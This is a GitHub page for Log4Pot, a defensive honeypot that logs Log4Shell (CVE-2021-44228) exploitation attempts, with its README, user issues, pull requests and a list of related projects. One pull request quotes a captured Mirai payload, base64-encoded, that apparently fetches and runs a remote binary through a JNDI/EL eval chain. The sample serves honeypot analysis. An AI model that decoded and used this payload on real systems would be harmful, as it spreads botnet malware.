A honeypot for the Log4Shell vulnerability (CVE-2021-44228)

Overview

Log4Pot

A honeypot for the Log4Shell vulnerability (CVE-2021-44228).

License: GPLv3.0

Features

  • Listen on various ports for Log4Shell exploitation.
  • Detect exploitation in request line and headers.
  • Log to file and Azure blob storage.

Usage

  1. Install Poetry: curl -sSL https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py | python3 -
  2. Fetch this GitHub repository git clone https://github.com/thomaspatzke/Log4Pot.git
  3. Change directory into the local copy with cd Log4Pot
  4. Install dependencies: poetry install
  5. Put parameters into log4pot.conf.
  6. Run: poetry run python log4pot.py @log4pot.conf

Alternatively, you can also run log4pot without external dependencies:

$ python log4pot.py @log4pot.conf

This will run log4pot without support for logging to Azure blob storage.

Analyzing Logs with JQ

List payloads from exploitation attempts:

select(.type == "exploit") | .payload

Decode all base64-encoded payloads from JNDI exploit:

select(.type == "exploit" and (.payload | contains("Base64"))) | .payload | sub(".*/Base64/"; "") | sub ("}$"; "") | @base64d
Comments
  • Attempt to run Log4pot

    Attempt to run Log4pot

    Hello,

    I am trying to run log4pot.py without any dependencies as mentioned in the Readme, as follows: python log4pot.py -p 8080

    I am having a syntax error on line 96: if (m := ). This is an invalid syntax, also what is the m variable?

    Please note, I tried to replace it with if (m==), I got an error that m is not defined.

    Any help please on this? Thank you

    opened by josephKhoury95 5
  • Getting an error: No module named 'pycurl'

    Getting an error: No module named 'pycurl'

    Hello,

    Is anyone getting this error:

    Pycurl not available or there is an issue with curl dependencies: No module named 'pycurl'

    I tried installing pycurl for both Python2 and Python3, using these commands.

    pip install pycurl

    pip3 install pycurl

    Both of these were already satisfied.

    opened by rangerrkm 5
  • error on non-azure installation

    error on non-azure installation

    FYI --

    $ python3 log4pot.py @log4pot.conf
    Azure dependencies not installed, logging to blob storage not available.
    usage: log4pot.py [-h] [--port PORT] [--log LOG] [--blob-connection-string BLOB_CONNECTION_STRING] [--log-container LOG_CONTAINER] [--log-blob LOG_BLOB] [--server-header SERVER_HEADER]
    log4pot.py: error: unrecognized arguments: storage connection string as provided in UI>
    
    opened by finchy 2
  • Exception

    Exception

    Just noticed the following exception:

    ----------------------------------------
    Exception occurred during processing of request from ('x.x.x.x', 55160)
    Traceback (most recent call last):
      File "/usr/lib/python3.9/socketserver.py", line 683, in process_request_thread
        self.finish_request(request, client_address)
      File "/usr/lib/python3.9/socketserver.py", line 360, in finish_request
        self.RequestHandlerClass(request, client_address, self)
      File "/usr/lib/python3.9/socketserver.py", line 747, in __init__
        self.handle()
      File "/usr/lib/python3.9/http/server.py", line 427, in handle
        self.handle_one_request()
      File "/usr/lib/python3.9/http/server.py", line 395, in handle_one_request
        self.raw_requestline = self.rfile.readline(65537)
      File "/usr/lib/python3.9/socket.py", line 704, in readinto
        return self._sock.recv_into(b)
    ConnectionResetError: [Errno 104] Connection reset by peer
    ----------------------------------------
    x.x.x.x - - [16/Dec/2021 13:44:23] "GET / HTTP/1.1" 200 -
    x.x.x.x - - [16/Dec/2021 13:44:23] "GET / HTTP/1.1" 200 -
    

    The according JSON log:

    {"type": "request", "timestamp": "2021-12-16T13:44:23.029029", "correlation_id": "39f57c86-3b8a-46da-8ac1-568030215755", "server_port": 80, "client": "x.x.x.x", "port": 41482, "request": "GET / HTTP/1.1", "headers": {"Host": "y.y.y.y:80"}}
    {"type": "request", "timestamp": "2021-12-16T13:44:23.258082", "correlation_id": "c01af0fb-dcdc-41f3-af09-8680c6c99d81", "server_port": 80, "client": "x.x.x.x", "port": 37514, "request": "GET / HTTP/1.1", "headers": {"Host": "y.y.y.y", "User-Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Accept": "*/*", "Accept-Encoding": "gzip"}}
    
    opened by t3chn0m4g3 2
  • Remove old installer

    Remove old installer

    Hello,

    I removed the deprecated installer for poetry as mentionned in their documentation and added the pyp alternative. Also added the sudo for some cases as well as the azure package that was missing when I tried to launch the script.

    opened by Thomasrgx 1
  • Implemented base64 decoding of javaSerializedData

    Implemented base64 decoding of javaSerializedData

    Automatic decoding of serialized java classes, such as Mirai stuff below:

    {
      ...
      "DN": "o=tomcat",
      "javaClassName": "java.lang.String",
      "javaSerializedData": "rO0ABXNyAB1vcmcuYXBhY2hlLm5hbWluZy5SZXNvdXJjZVJlZgAAAAAAAAABAgAAeHIAHW9yZy5hcGFjaGUubmFtaW5nLkFic3RyYWN0UmVmAAAAAAAAAAECAAB4cgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3Rvcnl0ABJMamF2YS9sYW5nL1N0cmluZztMABRjbGFzc0ZhY3RvcnlMb2NhdGlvbnEAfgAETAAJY2xhc3NOYW1lcQB+AAR4cHNyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAV1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAGmphdmF4Lm5hbWluZy5TdHJpbmdSZWZBZGRyhEv0POER3MkCAAFMAAhjb250ZW50c3EAfgAEeHIAFGphdmF4Lm5hbWluZy5SZWZBZGRy66AHmgI4r0oCAAFMAAhhZGRyVHlwZXEAfgAEeHB0AAVzY29wZXQAAHNxAH4AC3QABGF1dGhxAH4AD3NxAH4AC3QACXNpbmdsZXRvbnQABHRydWVzcQB+AAt0AAtmb3JjZVN0cmluZ3QABng9ZXZhbHNxAH4AC3QAAXh0AZd7IiIuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlciIpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCJKYXZhU2NyaXB0IikuZXZhbCgiamF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoU3RyaW5nLmZyb21DaGFyQ29kZSg5OSwxMDAsMzIsNDcsMTE2LDEwOSwxMTIsNTksMzIsMTE5LDEwMywxMDEsMTE2LDMyLDQ5LDU3LDU2LDQ2LDU3LDU2LDQ2LDU0LDQ4LDQ2LDU0LDU1LDQ3LDk4LDEwNSwxMTAsMTE1LDQ3LDEyMCw1Niw1NCw1OSwzMiw5OSwxMDQsMTA5LDExMSwxMDAsMzIsNTUsNTUsNTUsMzIsNDIsNTksMzIsNDYsNDcsMTIwLDU2LDU0LDMyLDEwOCwxMTEsMTAzLDUyLDEwNiw1OSwzMiwxMTQsMTA5LDMyLDQ1LDExNCwxMDIsMzIsNDIpKSIpfXBwcHBweHQAJW9yZy5hcGFjaGUubmFtaW5nLmZhY3RvcnkuQmVhbkZhY3RvcnlwdAAUamF2YXguZWwuRUxQcm9jZXNzb3I=",
      ...
    }
    

    The data should be decoded and written to a file if enabled. Payload was unfortunately already yeeted and therefore not available for testing anymore.

    opened by 3c7 0
  • Implement customizable download timeout

    Implement customizable download timeout

    :eyes: {"type": "exception", "timestamp": "2021-12-18T08:08:46.728625", "exception": "(28, 'Connection timed out after 3000 milliseconds')"}

    opened by 3c7 0
  • Deobfuscate payloads

    Deobfuscate payloads

    This PR adds another key to log entries which include the deobfuscated payload. This works probably not reliably in every case, but was tested with lots of ITW jndi payloads.

    opened by 3c7 0
Owner
Thomas Patzke
Loves to build InfoSec-related tools.
Thomas Patzke
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be

Binary Defense 144 Nov 19, 2022
ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065)

ExProlog ProxyLogon Full Exploit Chain PoC (CVE-2021–26855, CVE-2021–26857, CVE-2021–26858, CVE-2021–27065) Usage: exprolog.py [OPTIONS] ExProlog -

Herwono W. Wijaya 130 Dec 15, 2022
A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne

null 60 Dec 10, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v

lfama 8 Feb 27, 2022
Log4Shell Proof of Concept (CVE-2021-44228)

CVE-2021-44228 Log4Shell Proof of Concept (CVE-2021-44228) Make sure to use Java 8 JDK. Java 8 Download Images Credits Casey Dunham - Java Reverse She

Kr0ff 3 Jul 23, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Víctor García 187 Jan 3, 2023
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Wade 1 Dec 15, 2021
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Mitiga 13 Jan 4, 2022
A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. Recently there was a new vulnerability in log4j, a java loggin

koz 1.5k Jan 4, 2023
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability

CVE-2021-44228-log4jVulnScanner-metasploit open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability pre

Taroballz 7 Nov 9, 2022
IP Denial of Service Vulnerability ")A proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability ")

CVE-2021-24086 This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patc

Carry 1 Nov 25, 2021
CVE-2022-22536 - SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536

CVE-2022-22536 SAP memory pipes desynchronization vulnerability(MPI) CVE-2022-22

antx 49 Nov 9, 2022
A small Minecraft server to help players detect vulnerability to the Log4Shell exploit 🐚

log4check A small Minecraft server to help players detect vulnerability to the Log4Shell exploit ?? Tested to work between Minecraft versions 1.12.2 a

Evan J. Markowitz 4 Dec 23, 2021
POC for detecting the Log4Shell (Log4J RCE) vulnerability.

log4shell-poc-py POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3 python3 log4shell-poc.py <pathToTargetFile> <

BCC Risk Advisory 2 Dec 22, 2021
POC for detecting the Log4Shell (Log4J RCE) vulnerability

Interactsh An OOB interaction gathering server and client library Features • Usage • Interactsh Client • Interactsh Server • Interactsh Integration •

ProjectDiscovery 2.1k Jan 8, 2023
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

Northwave 125 Dec 9, 2022
Scan your logs for CVE-2021-44228 related activity and report the attackers

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs. search for malicious strings decode payloads print results to stdout or file report

js-on 2 Nov 24, 2022